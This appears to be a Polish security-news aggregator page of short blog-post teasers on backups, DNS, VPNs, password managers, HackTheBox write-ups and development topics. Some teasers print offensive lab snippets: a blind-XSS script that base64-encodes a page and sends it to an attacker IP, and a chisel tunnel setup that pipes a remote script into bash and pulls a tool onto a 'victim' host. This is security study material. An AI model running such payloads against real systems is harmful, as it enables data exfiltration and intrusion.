Serwisy SEC

#024: Nasze backupy

#024: Nasze backupy

bezpieczny.blog 3 years ago Na przeczytanie potrzebujesz < 1 minutę. Ludzie dzielą się na tych, co robią backupy i na tych, co będą je robić ? Jest wiele różnych metod robienia backupów. Niektóre prostsze, niektóre trudniejsze, mniej lub bardziej paranoiczne. W tym odcinku.....
Winget – aktualizacja systemu innych firm jak Microsoft

Winget – aktualizacja systemu innych firm jak Micr...

antynet.pl 3 years ago Automatyczna aktualizacja systemu innych firm jak Microsoft to bez wątpienia pozytywne naśladownictwo rozwiązań rodem z Linux. Uruchamiamy cmd jako administrator i wykonujemy polecenie: winget upgrade –all Fajna sprawa 😉.
DNS: co to jest? Jak działa? Jak wybrać i zmienić DNS na bezpieczne?

DNS: co to jest? Jak działa? Jak wybrać i zmienić ...

kwestiabezpieczenstwa.pl 3 years ago Co to są serwery DNS? Jak działają? Co mają wspólnego z bezpieczeństwem, prywatnością i cenzurą w sieci? Jak wybrać i zmienić DNS-y?
Jak wirusy wyłączają Windows Defendera?

Jak wirusy wyłączają Windows Defendera?

payload.pl 3 years ago Pewnie niejednokrotnie czytałeś artykuły o tym, iż Windows Defender jest najlepszym (czy wręcz jedynym potrzebnym) programem antywirusowym, bo jest ściśle zintegrowany z Windows. A z drugiej strony teksty, iż antywirusy komercyjne biją go na głowę. K...
Cyfrowa suwerenność Europy. Gość: Marcin Zmaczyński - POIT 116

Cyfrowa suwerenność Europy. Gość: Marcin Zmaczyńsk...

feeds.buzzsprout.com 3 years ago Witam w sto szesnastym odcinku podcastu "Porozmawiajmy o IT". Tematem dzisiejszej rozmowy jest cyfrowa suwerenność Europy.Dziś moim gościem jest Marcin Zmaczyński – Head of Marketing CEE w Aruba Cloud. Doświadczony manager odpowiedzialny za rozwiązan...
ARP poisoining + AS-REQ cracking

ARP poisoining + AS-REQ cracking

how2hax.pl 3 years ago Dzień dobry. Dziś chciałbym poruszyć temat bezpieczeństwa sieci lokalnych i pokazać jeden z kilku tzw. low-hanging fruits, po które łatwo sięgnąć gdy znajdziemy się już w interesującym dla nas segmencie sieci: LLMNR NBNS (NetBIOS Name Service) ARP po...
Fastify + Hotwire - nowy (lepszy?) pomysł na frontend

Fastify + Hotwire - nowy (lepszy?) pomysł na front...

fsgeek.pl 3 years ago Obstawiam, iż 90% aktualnie tworzonych aplikacji opiera się na podział frontend, backend i przesył danych pomiędzy nimi w postaci JSON'a. Frontend prosi o dane i gdy je otrzymuje, to odpowiednio modyfikuje wygląd strony. A może można przesyłać coś in...
Planujemy wielki atak – wstęp

Planujemy wielki atak – wstęp

payload.pl 3 years ago Tym artykułem rozpoczynamy nowy cykl, w którym objaśnimy krok po kroku, w jaki sposób zabrać się za zaatakowanie i wyprowadzenie danych z większej firmy - ale zanim przejdziemy do konkretów, musimy sobie wyjaśnić kilka podstawowych spraw.
Czemu, jak wpisuję błędne hasło przy logowaniu do banku, system nie wyświetla błędu?

Czemu, jak wpisuję błędne hasło przy logowaniu do ...

bezpieczny.blog 3 years ago Na przeczytanie potrzebujesz 3 minut(y). Nasza czytelniczka Magda (imię zmienione) korzysta z bankowości internetowej jednego z polskich banków. Zgodnie z naszymi radami używa skomplikowanego, unikalnego hasła i dwuskładnikowego uwierzytelnienia(PUSH...
Co to jest VPN? 8 porad jak wybrać VPN, aby być bezpiecznym w Sieci

Co to jest VPN? 8 porad jak wybrać VPN, aby być be...

kwestiabezpieczenstwa.pl 3 years ago Kompendium wiedzy o VPN: Co to jest? Jak działa? Dlaczego warto używać VPN? Jak wybrać odpowiedni VPN? + dodatkowo moja rekomendacja najlepszego VPN-a.
Eskalacja uprawnień: CVE-2019-1315 + CVE-2020-1170

Eskalacja uprawnień: CVE-2019-1315 + CVE-2020-1170...

how2hax.pl 3 years ago Cześć ? Poniższy wpis stanowi kontynuację poprzedniego artykułu o Windows Defenderze. W poprzednim artykule udało się nam doprowadzić do sytuacji w której możemy swobodnie usuwać zawartości wybranych przez nas folderów. W tym odcinku postaramy się pó...
Nowa wersja programu Arcabit

Nowa wersja programu Arcabit

arcabit.pl 3 years ago Trochę to trwało, mnóstwo programisto-testero-roboczogodzin upłynęło, ale już jest - całkowicie nowa wersja programu Arcabit.Udostępniliśmy również mechanizm szybkiej, automatycznej migracji do najnowszej wersji. Zachęcamy do zapoznania się z nową we...
10 lat więzienia dla cyberprzestępcy z grupy FIN7

10 lat więzienia dla cyberprzestępcy z grupy FIN7

bothunters.pl 3 years ago Wydano wyrok na 35-latka pochodzenia ukraińskiego, który był członkiem zorganizowanej grupy cyberprzestępczej FIN7. Wyrok to 10 lat pozbawienia wolności. Dodatkowo sędzia nakazał zapłacić 2,5 miliona dolarów odszkodowania. Grupa, w której uczestniczy...
Co z Rębaczami?

Co z Rębaczami?

rebacze.pl 3 years ago Co jakiś czas dostaję pytania – a co z Rębaczami? Odpowiadając krótko – na razie projekt jest w zawieszeniu, bo rozważam zmianę formuły. Ale – jak zwykle – wyjdzie w ….
Co z Rębaczami?

Co z Rębaczami?

rebacze.pl 3 years ago Co jakiś czas dostaję pytania – a co z Rębaczami? Odpowiadając krótko – na razie projekt jest w zawieszeniu, bo rozważam zmianę formuły. Ale – jak zwykle – wyjdzie w ….
Co z Rębaczami?

Co z Rębaczami?

rebacze.pl 3 years ago Co jakiś czas dostaję pytania – a co z Rębaczami? Odpowiadając krótko – na razie projekt jest w zawieszeniu, bo rozważam zmianę formuły. Ale – jak zwykle – wyjdzie w ….
Sprawdź, czy wyciekł twój telefon

Sprawdź, czy wyciekł twój telefon

rebacze.pl 3 years ago W weekend świat obiegła informacja, iż dostępna komercyjnie (i w darknecie) baza danych użytkowników Facebooka, zawierająca 533 milionów rekordów, została umieszczona za darmo w sieci. Zawierająca podstawowe informacje użytkowników baza ….
Rozmowa kontrolowana #53. Wywiad dla Z3S

Rozmowa kontrolowana #53. Wywiad dla Z3S

randomseed.pl 3 years ago W świąteczną niedzielę redaktorzy serwisu Zaufana Trzecia Strona – Adam Haertle i Adam Lange – przeprowadzili wielotematyczną rozmowę z Pawłem Wilkiem. Można posłuchać i pooglądać odpowiedzi dotyczących programowania zorientowanego na dane, eDiscover...
Menedżer haseł: wszystko, co musisz wiedzieć o bezpiecznym zarządzaniu hasłami

Menedżer haseł: wszystko, co musisz wiedzieć o bez...

kwestiabezpieczenstwa.pl 3 years ago Jak zabezpieczyć swoje hasła przy pomocy menedżera haseł? Jak działają menedżery, co oferują, jak ich używać, który wybrać? Sprawdzam.
Infrastruktura IT dla Domu Maklerskiego – case study Navigator S.A.

Infrastruktura IT dla Domu Maklerskiego – case stu...

dataspace.pl 3 years ago Sprawdź jakie środowisko IT przygotowaliśmy dla jednego z największych graczy w branży finansowej.
Handling Celery events (EN)

Handling Celery events (EN)

vilya.pl 3 years ago The code used in this article was written for Celery 5.0.5 but it should work with older versions as well (4.1.1 and higher). It’s available on GitHub. According to the Celery official documentation, a worker is able to generate...
Blind XSS Data Exfiltration

Blind XSS Data Exfiltration

blaszczakm.blogspot.com 3 years ago cat 2.js var xhr=new XMLHttpRequest(); xhr.open("GET", 'http://gym-club..htb/security_threat/report.php', false); xhr.send();var xhr2=new XMLHttpRequest(); xhr2.open("GET", "http://10.10.14.121/aaaa?=" + btoa(xhr.responseText), false); xhr2.send(); └...
Firestore - tworzenie, modyfikowanie i usuwanie danych

Firestore - tworzenie, modyfikowanie i usuwanie da...

fsgeek.pl 3 years ago Przy bazie danych równie istotne, jak pobieranie danych, jest również ich tworzenie. Do podstawowych operacji możemy zaliczyć tworzenie, edycję i usuwanie dokumentów oraz kolekcji. W przypadku Firestore jest kilka rozwiązań, które mogą zdziwić. Szcze...
Twoje hasła w końcu bezpieczne! Poradnik bezpieczeństwa haseł komputerowych

Twoje hasła w końcu bezpieczne! Poradnik bezpiecze...

kwestiabezpieczenstwa.pl 3 years ago Jak stworzyć silne, mocne i trudne do złamania hasło? Poznaj TOP 100 najpopularniejszych haseł w Polsce. Dowiedz się, jak łamane są hasła. Czy mierniki i testery siły hasła działają? Po co Ci kostka do gry i dlaczego musisz pamiętać...
Jak zrobić DDOS na ETH?

Jak zrobić DDOS na ETH?

chaindev.pl 3 years ago
Jak zrobić DDOS na ETH?

Jak zrobić DDOS na ETH?

chaindev.pl 3 years ago
Writeup: HackTheBox Doctor machine

Writeup: HackTheBox Doctor machine

whitehatlab.eu 3 years ago 1. TLDR 2. Preparation I prepared any useful variables: export IP=10.10.10.209 3. Scanning and designation First, I ran a scan with the nmap tool to uncover and identify the services that were moving on the 1000 most popular ports....
About WAF – Web Application Firewall with Artur Pajkert

About WAF – Web Application Firewall with Artur Pa...

maciejkuchnik.pl 3 years ago In this episode, Artur Pajkert introduces us to issues related to Web Application Firewall. In an hour-long episode, Artur talks about a solution that protects websites hosted on cyberfolks.pl all day.
New Cheatsheet XSS 2021

New Cheatsheet XSS 2021

blaszczakm.blogspot.com 3 years ago https://netsec.expert/posts/xss-in-2021/
Wyjątki. Czego unikać?

Wyjątki. Czego unikać?

bdabek.pl 3 years ago Java pozwala nam na używanie wyjątków do czego sobie zapragniemy. Jako developerzy wiemy natomiast, iż wyjątki służą do sytuacji wyjątkowych i mamy do nich jakiś szacunek. Jednak, kiedy przychodzi do zaprojektowania pewnej części systemu zdarza nam s...
Wyjątki. Czego unikać?

Wyjątki. Czego unikać?

bdabek.pl 3 years ago Java pozwala nam na używanie wyjątków do czego sobie zapragniemy. Jako developerzy wiemy natomiast, iż wyjątki służą do sytuacji wyjątkowych i mamy do nich jakiś szacunek. Jednak, kiedy przychodzi do zaprojektowania pewnej części systemu zdarza nam s...
"Nie będziemy negocjować" - casus CD Projekt RED

"Nie będziemy negocjować" - casus CD Projekt RED

sasmaczyliblogbezpiecznika.blogspot.com 3 years ago Najpierw parę faktów 09.02.2021 roku CD Projekt RED poinformował, iż został zhakowany, część urządzeń zaszyfrowana, skradzione zostały kody źródłowe kluczowych gier oraz duża ilość dokumentów.Przestępcy zażądali okupu grożąc ujawnieniem skradzionych...
Writeup: HackTheBox individual machine

Writeup: HackTheBox individual machine

whitehatlab.eu 3 years ago 1. TLDR 2. Preparation I prepared any useful variables: export IP=10.10.10.203 3. Scanning and designation At first I utilized the nmap tool to identify open ports: ┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/ Worker] └──╼ $nmap -s...
Writeup: HackTheBox Omni machine

Writeup: HackTheBox Omni machine

whitehatlab.eu 3 years ago 1. TLDR 2. Preparation I prepared any useful variables: export IP=10.10.10.204 3. Scanning and designation First, I utilized the nmap tool to identify open ports: ┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Other/ Omni] └──╼ $nmap -sC -sV ...
TCP/UDP reverse tunnel, transported over HTTP, secured via SSH - chisel

TCP/UDP reverse tunnel, transported over HTTP, sec...

blaszczakm.blogspot.com 3 years ago #### CHISEL INSTALL curl https://i.jpillora.com/chisel! | bash ## copy to victim server: www-data@passage:/tmp$ wget http://10.10.14.143/chisel wget http://10.10.14.143/chisel --2021-01-25 08:55:34-- http://10.10.14.143/chisel Connecting to 10.10.1...
Red Team Notes 2.0

Red Team Notes 2.0

blaszczakm.blogspot.com 3 years ago https://dmcxblue.gitbook.io/red-team-notes-2-0/
Pihole – Cert Hole itp

Pihole – Cert Hole itp

antynet.pl 3 years ago DNS Hole od kilkunastu lat jest wykorzystywane do wielu celów. Zwykle do blokowania reklam na portalach, usług śledzących itp. Jednakże dożyliśmy takich czasów, iż DNS Hole coraz częściej wykorzystywane jest do zapewnienia bezpieczeństwa użytkownikó...
Redis. Wprowadzenie Dla Początkujących

Redis. Wprowadzenie Dla Początkujących

bdabek.pl 3 years ago Redis jest popularnym projektem open sourcowym, który od roku 2013 zyskuje coraz to większą i większą rozpoznawalność w światku IT. Dziś, w roku 2021, Redis jest znany jako NoSQL-owa baza danych klucz-wartość działająca w pamięci, a jej najpopularnie...
Redis. Wprowadzenie Dla Początkujących

Redis. Wprowadzenie Dla Początkujących

bdabek.pl 3 years ago Redis jest popularnym projektem open sourcowym, który od roku 2013 zyskuje coraz to większą i większą rozpoznawalność w światku IT. Dziś, w roku 2021, Redis jest znany jako NoSQL-owa baza danych klucz-wartość działająca w pamięci, a jej najpopularnie...
Serwery dla integratora systemu ERP enova365 – case study COM@COM

Serwery dla integratora systemu ERP enova365 – cas...

dataspace.pl 3 years ago Systemy ERP są krwioobiegiem nowoczesnej firmy, żeby działały w sposób optymalny muszą dysponować odpowiednią infrastrukturą - sprawdź jakie środowisko przygotowaliśmy dla integratora COM@COM.
Pihole – regexp

Pihole – regexp

antynet.pl 3 years ago Jeśli ktoś korzysta z PiHole to podaję swoje regexp. Opracowane na podstawie własnych analiz ruchu itp. Domeny wyłapane w ruchu ISP Debacom Zabrze: [0-9a-za-z]{13-18}\.tickets [0-9a-za-z]{13-18}\.blackfriday v1\.[a-uw-z]{7}\.ru v[12]{1}\.[a-uw-z]{7}\...
Random:view #003 – Crosscast Cyber, Cyber… 113: Rozmowa z kocem o mRNA

Random:view #003 – Crosscast Cyber, Cyber… 113: Ro...

randomseed.pl 3 years ago Rozmowa Mirosława Maja i Łukasza Jachowicza z Pawłem Wilkiem na temat reverse engineeringu szczepionki przeciwko SARS-CoV-2 w ramach podcastu Cyber, Cyber… Fundacji Bezpieczna Cyberprzestrzeń.
MAC address c8:93:46 – ZeverSolar

MAC address c8:93:46 – ZeverSolar

antynet.pl 4 years ago Robiłem porządki w swojej sieci domowej. Napotkałem na problem, adres mac: c8:93:46:36:10:1c Gadatliwe to nie było, porty pozamykane. MAC address określał producenta: "MXCHIP Company Limited" Wiele to nie dało, poza tym iż trop kierował na IoT. Poni...
Kalendarium - przegląd wydarzeń z 2020 roku

Kalendarium - przegląd wydarzeń z 2020 roku

zawszeczujni.pl 4 years ago 2020 rok już za nami, dlatego zdecydowaliśmy się przypomnieć naszym czytelnikom niektóre ważne wydarzenia dotyczące służb specjalnych oraz branży IT, tworząc mini kalendarium 2020 roku:
Ataki AIR-FI. RAM jako nadajnik radiowy

Ataki AIR-FI. RAM jako nadajnik radiowy

randomseed.pl 4 years ago Szyny danych w pamięciach RAM współczesnych komputerów osiągnęły takie częstotliwości pracy, iż możliwe jest używanie ich w roli nadajników radiowych, a co za tym idzie wykorzystywanie do wykradania danych, choćby wtedy, gdy komputer jest odłączony o...
PfSense – repo oficjalne BSD

PfSense – repo oficjalne BSD

antynet.pl 4 years ago /etc/pkg/FreeBSD.conf –> ustaw enabled na yes /usr/local/etc/pkg/repos/FreeBSD.conf –> ustaw enabled na yes /usr/local/etc/pkg/repos/pfSense.conf –> ustaw enabled na yes.
Reverse engineering kodu źródłowego szczepionki. BioNTech / Pfizer SARS-CoV-2

Reverse engineering kodu źródłowego szczepionki. B...

randomseed.pl 4 years ago Witaj! W tym poście będziemy przyglądali się znak po znaku kodowi źródłowemu szczepionki BioNTech / Pfizer SARS-CoV-2 mRNA.
POIT 099: Podsumowanie 2020

POIT 099: Podsumowanie 2020

feeds.buzzsprout.com 4 years ago Witam w dziewięćdziesiątym dziewiątym odcinku podcastu "Porozmawiajmy o IT". Tematem dzisiejszej rozmowy jest podsumowanie roku 2020.Dziś moim gościem jest Grzegorz Kotfis – programista z wieloletnim doświadczeniem najsilniej związany z technologią ....
Writeup: HackTheBox SneakyMailer machine

Writeup: HackTheBox SneakyMailer machine

whitehatlab.eu 4 years ago 1. TLDR 2. Preparation I prepared any useful variables: export IP=10.10.10.197 3. Scanning and designation First, I ran a scan with the nmap tool to uncover and identify the services that were moving on the 1000 most popular ports....
Intercept http2 (grpc) in BURP SUITE PROXY

Intercept http2 (grpc) in BURP SUITE PROXY

blaszczakm.blogspot.com 4 years ago as root: iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d 18.159.107.117 -j REDIRECT --to-port 8080 adduser mitmproxyuser cat /etc/nghttpx/nghttpx.conf (downstream config) frontend=0.0.0.0,8080;no-tls backend=127....
English (US) English (US) · Polish (PL) Polish (PL) · Russian (RU) Russian (RU) ·
Kontakt · Regulamin · O nas ·

© Poland 2025. All rights are reserved